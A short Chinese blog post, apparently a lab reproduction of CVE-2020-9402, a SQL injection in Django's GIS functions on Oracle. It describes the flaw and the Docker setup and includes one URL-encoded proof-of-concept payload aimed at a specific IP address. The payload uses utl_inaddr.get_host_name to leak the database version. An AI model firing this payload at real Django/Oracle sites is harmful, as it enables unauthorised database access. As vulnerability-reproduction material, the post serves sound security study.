Oracle SQL 注入上的 Django GIS 函数和聚合漏洞 (CVE-2020-9402)

blackK_YC2023-11-30 17:59

漏洞描述

Django 于2020年3 月4日发布了一个安全更新,修复了 GIS 函数和聚合中的 SQL 注入漏洞。

参考链接:

该漏洞要求开发者使用 JSONField/HStoreField;此外,还可以控制 QuerySet 的字段名称。Django 的内置应用程序 Django-Admin 受到影响,这为我们提供了一种重现漏洞的简单方法。

漏洞环境及利用

搭建docker环境

这里遇到一个问题,这个占用空间比较大卡住了,后来查看docker日志才发现

漏洞利用POC

http://139.196.87.102:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1

漏洞利用如下

相关推荐
墨尔本、晴6 小时前
[Django-web]1.环境准备
python·django
123过去7 小时前
mdb-sql使用教程
linux·网络·数据库·sql
敬业小码哥9 小时前
记一次:sqlit3恢复database disk image is malformed
数据库·sql·sqlite3
小江的记录本10 小时前
【Java】Java核心关键字:final、static、volatile、synchronized、transient(附《面试高频考点》)
java·开发语言·spring boot·后端·sql·spring·面试
mygljx10 小时前
oracle 12c查看执行过的sql及当前正在执行的sql
java·sql·oracle
蓝黑202011 小时前
SQL的update语句更新顺序的坑
数据库·sql·mysql
dyxal11 小时前
SQLite扩展加载详解:用`SELECT load_extension()`为数据库装上“外挂”
数据库·sqlite
山峰哥11 小时前
《解锁SQL高效查询:从索引设计到执行计划优化》
服务器·数据库·sql·oracle·性能优化
qq_2837200512 小时前
MySQL实战(七):日常运维 SQL汇总
运维·sql·mysql
hopsky12 小时前
ClickHouse SQL 在 Java 中的校验方法
java·sql·clickhouse
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南04围棋-html版本05班级宠物园部署指南06小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)07UV安装并设置国内源08OpenClaw 使用和管理 MCP 完全指南09【计算机一级WPSoffice】小黑课堂题库软件下载安装教程(2026年3月最新版)10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)